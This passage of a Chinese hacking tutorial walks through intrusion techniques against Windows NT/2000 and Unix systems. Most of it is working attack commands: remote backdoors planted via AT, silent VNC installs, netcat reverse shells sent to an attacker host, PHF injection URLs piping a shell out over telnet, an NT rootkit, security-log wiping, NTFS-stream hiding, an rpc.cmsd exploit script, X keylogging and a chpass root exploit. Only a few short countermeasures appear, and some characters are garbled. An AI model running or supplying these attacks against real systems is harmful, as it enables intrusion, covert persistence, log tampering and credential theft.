**远程作业
得到了帐户、种植了Sniffer,但是固执的Blackhat并不因此而禁止他们的控制欲望。后门的威胁也就随之而来。这里我所安装的仅仅是一个简单的远程命令行工具remote.exe,它可以使用/C参数来启动客户模式,而使用/S来启动服务器模式,因此在远程机器使用AT指令设置了启动时间。假如服务器没有启动调度服务,那么使用sc.exe使其启动,剩下的工作就让调度为我们工作,步骤简叙如下:
1.拷贝remote.exe和sc.exe到目标机器,方法很多,诸如使用net use等方法(记住,此时你应该具有权限帐号)。
2.启动调度服务
C:oolbox>sc \target_machine start schedule
3.检查目标系统的时间,方便对时
C:oolbox>net time \target_machine
Current time at \target_machine is {date} {time} {PM/AM}
……
4.使用AT指令在目标上启动remote.exe服务
C:oolbox>at \target_machine {time} ““remote /s cmd passwd””
Added a new job with job ID=13
5.测试服务 C:oolbox>remote /c {target_ip_addr} passwd
**************************************
********** remote ****************
********** Client ****************
**************************************
Connected..
Microsft(R) Windows NT(TM)
(C) Copyright 1985-1998 Micrsoft Corp.
C:>dir winntsystem32configsam
驱动器 C 中的卷没有标签。
卷的序列号是 3DCC-5BF7
C:winntsystem32config 的目录
2003-02-24 22:41 9,865 sam
1 个文件 9,865 字节
0 个目录 2,509,623,296 可用字节
C:>@q #退出远程系统
费力,敲入那么多命令,相信懒惰的攻击天才们决少数也这么固执的,于是建立于懒惰思维的图形控制想法也就变的不足为奇了。
**winvnc的劫持
虽然网络里诸如pcanywhere、netbus等有名的图形控制工具相当具有杀伤力,不过我这里要特别介绍VNC这个容易安装,且具有免费和自由气质的控制工具。但是,安装这个小巧精致的装置,仍然需要稍微复杂些的特技。
首先,需要拷贝VNC服务器到目标机器(这里为:winvnc.exe,vnchooks.dll,othread2.dll三个文件),但是我们必须通过设置VNC服务器才能使其正常运行,一般是通过GUI的方式进行配置,但是我们在远程启动VNC启动,必然在目标机器上弹出一个GUI对话框(没有哪个Blackhat会愿意看到如此结果吧!)。好的,我们可以这样设想:其目标机器的设置文件把最终的配置写入注册表中,那么只要我们的机器与目标机器是同一操作系统的化,本地的注册表键值VNC结构一定与目标机器相差无几。
根据这个聪明的想法,于是我们有了新的思路:在本地安装并配置VNC服务器,并使用NTRK赐予我们的精良武器regdmp.exe转储本地VNC注册表键值并使用regini.exe把所需要的项目直接添加到远程注册表中,这样就能够启动服务器,以下是步骤简概:
C: >regdmp HKCUSoftwareorlwinvnc3 >vnc.ini
#导出注册表VNC服务器设置键值
C:>regini –m {target_machine} vnc.ini
#把注册表键值添加入远程机器注册表
#登录远程机器,安装并启动VNC服务
C:>winvnc –install
C:>net start winvnc
通过vncviewer客户端就可以静静的以图形界面方式观察远程机器的任何动作,这类幽雅的管理方法很受管理管理员的称赞,同时也受到Blackhat的青睐。不过,VNC的进程却是无法隐藏的,因此只需要小心系统内部进程就可以发现其藏匿的踪影。
**防火墙下的暗道
前面所探讨的控制权利似乎都基于了网络管理不设防行为而布置的策略,然而,现实世界的网络中必然不能缺少防火墙之类的堡垒的。于是前面的思维模式似乎变的到处碰壁,无计可施。
总所周知,防火墙总是放行一些“行为端正”的数据通过自身,源于这个要点,我们实现了架设防火墙下暗道的思路:在防火墙内部尽力得到一部受“污染”的机器,在其上安装端口重定向软件并监听端口,将监听获得的原始分组转发到特定的第二目标。为了便于理解,下面我们就以著名的nc.exe做个端口重定向的小实验:
首先,在攻击者机器<intrude.org>分别使用两个命令行终端,记住是不同的两个终端窗口。其中一个窗口监听80端口,另一个端口监测25端口。
C:oolbox>nc –nvv –l –p 80
C:oolbox>nc –nvv –l –p 25
其次,在防火墙内部的机器使用shell回铲的办法(这里假设受污染机器<dirty.net>上已经有nc.exe并且安装远程执行命令服务):
C:oolbox>nc intrude.com 80 | cmd.exe | nc intrude.org 25
一般,防火墙总会允许http和smtp服务的数据进出,这样,上面的命令就可以从受污染的机器铲回一个远程命令shell来控制防火墙内部机器(在入侵者的机器中,在监听80端口的窗口输入命令,其结果就可以在监听25端口的窗口显示出来),甚至渗透整个内部网络。这种暗道的正确说法也被称为回铲(shovel)。
这种令初学者头晕的思维实在模糊,一个简单易用的端口重定向工具rinetd,其使用非常简单,只需要创建一个转发配置文件就可以启动。然而,为节省篇幅,下面讲述将是基于重定向原理而产生的精品fpipe。
fpipe最绝妙的地方在于它实现了隧道原理。通常防火墙只允许必要的服务端口通过,比如源端口53就可以通过防火墙为内网客户端解析域名。而fpipe可以指定53此类源端口,透过防火墙建立连接;一旦防火墙后客户连接此类伪造端口,就可以建立一个隧道传输telnet所必须的命令,也即端口重定向到23端口,回送一个telnet连接,而防火墙因为其源端口是“正常”端口,于是整个玲珑精致的攻击就如此发生: C:>fpipe -v -l 53 –s 53 -r 23 192.168.1.10FPipe v2.04 - TCP port redirector.Copyright 2000 (c) by Foundstone, Inchttp://www.foundstone.comConnection accepted from 192.168.1.10 port 3794Attemption to connect to 192.168.1.10 port 23Pipe connected: In: 192.168.1.10:3749 - -> 192.168.1.4:53 Out: 192.168.1.4:53 - -> 192.168.1.10 23 ……
从以上实验,可以清楚的看见fpipe精致的端口重定向的特点,并看出回送的telnet的连接。这样的“合法渗透”让人不寒而栗。
**终极损毁
Unix世界流传着Rootkit的邪恶事迹,通过对内核的篡改/编译,这些Rootkit傀儡帮助Blackhat在字符世界为所欲为。然而,当Windows世界也新生了这样的鬼怪,于是视窗世界也变的混乱模糊了。Hoglund制作的rootkit可以执行注册表键的隐藏及exe重定向,从而可以对正常程序注射木马而不改变其内容。通过对NT/W2K核心程序添补,篡夺系统调用,从而隐藏进程、注册表或文件,也可重定向程序调用到木马进程中。结果这种恶意的行为使我们对所有程序的执行完全失去了信心。
其相关软件可www.megasecurity.org/Tools/nt_rootkit_all.html或www.rookit.com查询(本文所附带的toolbox也包括这个软件)。它包括_root_.sys和deploy.exe。运行deploy.exe并启动net start _root_就启动rootkit。于是,注册表中以_root_的键值将在regedit.exe/regedt32.exe的视图中隐藏。对于目前的4.0版本添加了键盘击键记录的功能;系统中任何以_root_开头的进程也将隐藏。
至于端口重定向的问题,我们将进行一个实验来展示其精妙之处。首先,启动rootkit,拷贝一个可执行文件,比如:calc.exe到C:est目录下面。接着,重命名cmd.exe为_root_cmd.exe并拷贝到C:est下面。这时候rootkit程序会自动识辨_root_开头的程序,并重定向其到calc.exe,因此当运行_root_cmd.exe会出现计算器的界面(通过这种方式启动木马程序容易之极)。之后,关闭rootkit服务,使用Ultraedit比较cmd.exe和_root_cmd.exe,居然两者内容一致。这种令人可畏的做法让我十分敬佩Hoglund的思维模式。
有必要提到的一点变是,在系统中控制安装操作这些“精品”软件动作一般会由系统记录在案,而系统管理员每日任务之一也就是查看这些珍贵的日志文件。Lauritsen经过辛苦的分析复杂的NT日志语法,编写了elsave工具能适应这种抹除痕迹要求。下面句法将清除远程机器上安全日志的结果(需要得到目标机器合适的特权):
C:oolbox>elsave –s \remote_machine -l “Security” –C
**流的伪装
最后,在探讨关于NTFS提供文件内分化多个信息流(streaming)的支持。这种特性使得我们可以在获得系统权限的主机上藏污纳垢。下面的例子则是简单把nc.exe藏匿和运行的流应用(工具取自POSIX中CP工具,下载地址<http://home.socal.rr.com/err0neous/POSIX/>;;):
C:oolboxposix>cp nc.exe 1357298.tmp:nc.exe
对于分流后的文件,前前端(1357298.tmp)仍能执行其作用,而后端(nc.exe)则需要使用:C:>start 1357298.tmp:nc.exe来执行。
【小结提要】
通过前面几小节的探讨和研究,稍微浅尝黑客世界里精湛技艺,也稍微掌握了一些系统入侵的基本思路和行为模式。对于上叙已经的攻击方式,当然已经有了相应的对策,为节约时间,这里列举四个小对策,其他资料可到google查询:
1、限定注册表的远程访问
regedt32-->安全菜单|权限==>关闭 NT Everyone读写权限和完全控制权限。
2、监测可疑端口
netstat -an | find "12345" http://www.foundstone.com 的fport工具也能实现如此功能!)
3、指纹检查技术(fingerprint),防止程序或文件被恶意修改,这里使用MD技术: D:>md5 d:est.txt>d:est.md5
D:>cat d:est.md5
efd3907b037774d831596f2c1b14a d:\test.txt
D:>md5sum --check d:est.md5
4、关闭W2K文件和打印共享属性
网络和拨号连接*“高级”菜单*高级设置*取消“Microsoft网络的文件与打印机共享”。
至此,我们完成了NT/W2K的漫游旅程。歇息一下,我们进入字符与命令的神奇世界。
*Unix/Linux,命令与脚本的天堂
Unix的历史很悠久,因此也有了许多动人的传奇故事。Eric所维护的Jargon File中,记载着这个世界很多围绕它而诞生的英雄史诗;而作为新星的Linux则在计算机的发展取到了推动作用,GNU的原则,让我们终于没有了技术界线和垄断。这里充满和平和自由,于是这里的天地将更赋有期待和激情。
【溢出初步】
关于溢出的这个问题,我记得曾经在1999-2001年的时候狂热的风行好些时候,那时候狂人们似乎有用不完的力气,于是溢出攻击的工具齐全了,溢出攻击的手段也逐渐偏向简单化。
以下是堆栈溢出原理的简单程序示例(本代码摘自
http://www.w00w00.org/files/heaptut/heaptut.txt): #include <stdio.h>#include <stdlib.h>#include <unistd.h>#include <string.h>#define BUFSIZE 16#define OVERSIZE 8 /* overflow buf2 by OVERSIZE bytes */int main(){u_long diff;char *buf1 = (char *)malloc(BUFSIZE), *buf2 = (char *)malloc(BUFSIZE);diff = (u_long)buf2 - (u_long)buf1;printf("buf1 = %p, buf2 = %p, diff = 0x%x bytes
", buf1, buf2, diff);memset(buf2, 'A', BUFSIZE-1), buf2[BUFSIZE-1] = '�';printf("before overflow: buf2 = %s
", buf2);memset(buf1, 'B', (u_int)(diff + OVERSIZE));printf("after overflow: buf2 = %s
", buf2);return 0;}
编译执行此代码:
[root /w00w00/heap/examples/basic]# ./heap1 8buf1 = 0x804e000, buf2 = 0x804eff0, diff = 0xff0 bytesbefore overflow: buf2 = AAAAAAAAAAAAAAAafter overflow: buf2 = BBBBBBBBAAAAAAA
这里缓存1的溢出边界填充了缓存2,而由于缓存2的堆栈空间仍属于合法内存空间,因此程序不会崩溃。
缓冲区溢出条件发生在进程试图往缓冲区放入比分配的空间还要多的数据的时候,这可以导致段越界异常发生。攻击者可以精心设计,发送将溢出缓冲区并执行特定的命令代码。而程序发生溢出,可以改变函数的返回地址,以允许攻击者改变程序的执行流。而由于程序本身是以特权运行,于是执行的恶意代码也具有的特权模式,从而实现攻击。
产生这段执行程序代码根据系统的硬件体系结构不同而大相径庭,不过我们仍然可以借助一些自动工具产生称之为shellcode的特殊代码,比如本toolbox所包括的hellkit就是其中一个。
关于如何利用缓冲区溢出攻击的实现细节和详尽制作工序可以参阅“飞客杂志”第49期14小节(P49-14)和2个黑客论坛FAQ版区的基础讲座。
【知识应用组合攻击】
**PHF漏洞实验
著名的PHF漏洞相信很多人都应该知道。该漏洞是Apache服务器的一个CGI漏洞。该漏洞利用输入验证的不严格性,可以在输入字串中含有执行命令,从而逸出到可使用的shell。比如:/cig-bin/phf?Qalias=x%a/bin/cat%20/etc/passwd就可以查看服务器的帐户密码文件。
前面所叙述的shell回铲方式结合phf我们就可以完成一次简单的攻击:
<终端一>[attacker]#nc -l -n -v -p 80listening on [any] 80<终端二>[attacker]#nc -l -n -v -p 25listening on [any] 25<受害机器>#制造一个反向Telnet从而回铲shell的脚本/bin/telnet evil_hackers_ip 80 | /bin/sh | /bin/telnet evil_hackers_ip 25#其对应PHF语法如下(%a代表回车,%20代表空格)http://www.victim.com/cgi-bin/Qalias=x%a/bin/telnet%20evil_hackers_ip%2080%20|%20/bin/sh%20|%20/bin/telnet%20evil_hackers_ip%2025
当然,我们还可以结合xterm终端工具和X服务器原理,而制造如下请求:
/cgi-bin/phf?Qalias=x%0a/usr/X11R6/bin/xterm%20-ut%20-display%20evil_hackers_IP:0.0,这个请求将会在攻击者的显示屏幕上弹出一个xterm,提供了受害者的shell命令界面给予操作。
**邮件的几个问题
曾经流行一时的sendmail 4.1漏洞就在于通过管道方式,攻击者可以直接以特权方式执行命令(命令行顺序输入如下指令):
Telnet smtpwww.victim.com 25helomail from: |rcpt to: bouncedata.mail from: binrcpt to: | sed '1,/^$/d' | shdata
然而这个漏洞如今几乎无处可以查询。而另一个精致的渗透方式则利用了邮件转发功能,用户主目录下的.forward把指定邮件转移到另一帐号或邮件到达时候运行某个程序,下面实验需要对受害者的主目录具有写权限:
[Labmachine]$ cat > .forward
| "cp /bin/sh /home/test/sh ; chmod 755 /home/test/sh"
[Ctrl+D]
#上载此文件到用户的主目录下,并执行下面程序
[Labmachine]$ echo hello chump | mail test@targetsystem.com
执行后生成受害用户的一个shell,不过由于上载.forward需要对用户目录有写权限,因此这种方法似乎有些绕圈子的味道。
当然,关于sendmail的众多漏洞是数以百计的,这是由于sendmail的结构体系过于庞大,功能过于复杂多变而引起的。采用安全性更高的qmail似乎能解决sendmail的安全性问题。
**RPC挖掘
RPC的好处凡是使用过UNIX的人都知道,这是一种允许在一台计算机上运行的某个程序无缝地在另一个远程系统上执行代码的机制。而且由于许多厂家的支持,多数主流的Unix服务器仍采用了RPC标准。但由于RPC设计时候,很少考虑安全特性,因此由此引入的隐患也明灭可睹。基于CDE桌面系统的rpc.ttdbserverd和rpc.cmsd漏洞溢出;与NFS有关的rpc.statd和rpc.mountd的利用都是经典的例子(这类文章可以在google中搜索得到),下面的例子采用了CERT的ca-99-08-cmsd的文章:
#####cmsd.sh############!/bin/shif [$# -lt 4]; thenecho "Rpc.cmsd buffer overflow for Solaris 2.5 & 2.6 7"echo "If rpcinfo -p target_ip | grep 100068 = ture - you win!"echo "Don't forget to xhost+ the target system"echo " "echo "Usage: $0 target_hostname target_ip < O/S version (1-7)> your_ip"exit 1fiecho "Executing exploit..."cmsd -h $1 -c "/usr/openwin/bin/xterm -display $4:0.0 &" $3 $2#####cmsd.sh end##########[Labmachine]#cmsd.sh {system_name} 192.168.1.11 2 192.168.1.103
rpc.cmsd漏洞是针对特定的操作系统而量身定制的,本例程中适合于Solaris2.5、2.6、2.7操作系统。溢出成功后,则回送攻击者一个xterm的shell命令,其权限是受害主机的root!这种典型应用的确让人吓了一跳。
RPC带来便利的同时也引入安全问题,因此现代的UNIX系统中引入了密钥方式的Secure RPC,这种认证机制的引入相信可以修补RPC不健全的机制。
**X window小试
专业的Unix管理员一般很排斥使用GUI界面方式来管理系统。但是对于初学者来说,使用图形管理界面能逐渐适应从“鼠标到键盘”的管理思维方式的转变。X window系统则提供了多个程序以图形方式显示的丰富特性。但由于X windows是基于网络机制设计的,一旦用户掌握X windows就可以捕获键盘击键、关闭窗口、启动各种恶意命令,这种无法无天的闹剧真是令人头痛。当然,可以xhost命令进行认证控制。但是有些管理员为求方便,使用xhost +命令,于是允许了未加认证的访问。
通过xscan可以扫描出具有xhost +设置的X服务器。pendleto于96年写的一个小工具,经久不衰呀!扫描网络中开放Xwindow并且允许连接的主机,并自动开始记录该Xwindow系统的所有键盘击键。
[Labmachine]$xscan XmachineScanning hostname Xmachine…Connection to Xmachine (192.168.1.65) on port 6000Connected.Host quake is running X.Starting keyboard logging of host Xmachine:0.0 to file KEYLOG.Xmachine:0.0…
#其键盘记录文件为KEYLOG.Xmachine,记录非常详细:
[Labmachine]$tail –f KEYLOG.Xmachine:0.0suroot[Shift_R]sys#
使用xlswins确定目标系统窗口的16进制ID号
[Labmachine]#xlswins –display Xmachine:0.0
……
0x1000385 (netscape)
……
如果限制xhost -,那么仍然可以绕过认证,使用xwd来截获荧屏的瞬间图像。对于X window的使用应该注意在防火墙封堵6000-6063端口,使用SSH等方式加密X 会话,并使用XDM-AUTHORIZATION-1等安全认证机制防止偷窃行为的发生。
【文件描述字符的利用】
文件描述字符(file descriptor)是文件属性的字符象征,0、1和2分别表示了标准输入、标准输出和标准错误输出。当打开或创建文件的时候,内核为调用程序分配一个文件描述字,可用于读写该文件。按照这个原理,如果更改写某个关键的系统文件,我们可以使用文件描述进行写入操作,从而得到root权限。
OpenBSD 2.3版本中存在这样的漏洞,用于修改密码的chpass执行时允许普通用户使用自选的编辑器编辑临时文件,于是可以设置编辑器为vi,从而逸出一个shell,这样就可以在/etc/master.passwd中创建一个uid为零的帐号,以此获得root访问权限: [BigHole]$export EDITOR=vi
[BigHole]$/usr/bin/chpass
#编辑用户数据库
Shell:/bin/sh
Full Name:star amethyst
Location:
Office Phone:
Home Phone:
#使用vi编辑器逸出shell
":!sh"
#执行由Mark Zielinski提供的chpass漏洞挖掘代码,添加staramethyst帐号
[BigHole]$nohup ./chpass &
[1] 21553
$ sending output to nohup.out
[1] + Done nohup ./chpass
[BigHole]$exit
Press any key to continue [: to enter more ex commands]:
/etc/pw.F26119: 6 lines,117 characters.
#至此,完成权限提升,得到root权限
[BigHole]$su staramethyst
[BigHole]#id
uid=0(owned) gid=0(wheel) groups=0(wheel)
(附chpass代码:
int main()
{
FILE *f;
int count;
f=fdopen (FDTOUSE, "a");
for (count = 0; count !=30000; count++)
fprintf(f, "owned::0:0::0:0:staramethyst,,,:tmp:/bin/bash
");
ext(0);
}
)
关于文字描述符号问题,应该是程序员考虑的问题:自己是否恰当分配了文件描述字符;非必要的suid,guid的文件应该除去其属性等因素。系统很多安全的漏洞原因其实是由于平日对代码的不严格审查而产生的,这里是否值得我们这些程序员深思呢?对于不安全特性,不仅是用户的问题,而是整个网络帝国应该考虑的问题。
【输入域分隔符IFS】
“记起以前在Log指点我在hackerslab攻关日子真的很辛苦。其中有一道关就是理解IFS,从而得到通关密码。” IFS变量用于在shell环境中分隔所输入的执行。通常设置为空白符。一种攻击的方法是通过输入域分隔符(IFS)Shell变量得逞的。例如一个程序调用函数system()执行命令,那么该命令首先由Shell来分析。程序执行代码system("/bin/ls-l"),同时IFS变量被设置为包含“/”的字符,而一个恶意的程序被命名为bin并放在用户的PATH内,则该命令会被解释成bin ls-l,它执行程序bin并带有两个参数ls和-l,这就实现权限提升
下面是设置IFS的命令的例子:
$IFS=/
$export $IFS
有了以上理论基础,我们将对hackerslab的第四关进行讲解。
铨目:
Steven 的慢动作是出了名的,他从?不会准时!他也察觉到呃个问题,并且知道他必?做一点改变,他配合 `date` 呃个指令,用 C 语言写了一个简单的工具,可以在他每次登录电脑用 YYYY-MM-DD 的格式显示目前的时间。他把它放在一个秘密的目录之中,因为他担心其他人会看见这个工具。把它找出?,并且获得进入下一关的密瘁。
攻关步骤:
Steven程序date指令显示日期,因此在环境变量中设置命令执行路径先于原路径,并制造一个date脚本,就可以执行自己定义的date指令,从而获得执行执行/bin/pass的权利,获得密码: 1、设置PATH变量
PATH=~/tmp:$PATH
2、制作date
[level3]#vi date
#!/bin/sh
/bin/pass
[level3]chmod +x date
3、由于程序使用date绝对路径,设置IFS为/
[level3]IFS=/
[levle3]export IFS
4、得到过关密码
[level3]./today
通过此题,对于IFS有了深入的理解。新版本的Unix系统已经能够忽略IFS的设置,所以对于现代主流的系统危害不算很大,不过由于入侵手法很精巧,因此加入文中。
*我们一直在尽力
耗费了几个通宵,总算完成了这片面向初级学者的入侵防御的文章。但是关于系统安全方面的很多领域我们仍然没有涉及,而且很多地方也是带领读者走马观花般的领略在入侵方面许多精致的思维和独特的创意,并没有做深入的分析和讲解,因为时间和工作关系,希望读者谅解。
然而,我希望这篇文章能起到一个抛砖引玉的作用,通过本文能激发各位的创造欲和对新事物探索的强烈渴望。使用自己无穷的动力和潜在思维在这里虚拟世界中创造更加美好的事物。
【参考资料】
1、《Maximum Security》Anonymous,Published by Sams.net Publishing.
2、《Hacking Exposed:Network Security Security Secrets & Solutions》Joel Scambray,Stuart McClure,Published by McGraw-Hill Education.
3、《Maximum Linux Security》Anonymous,Published by Sams Publishing.
4、《Windows NT 4 Security Mannual》Anonymous,Published by Sams Publishing
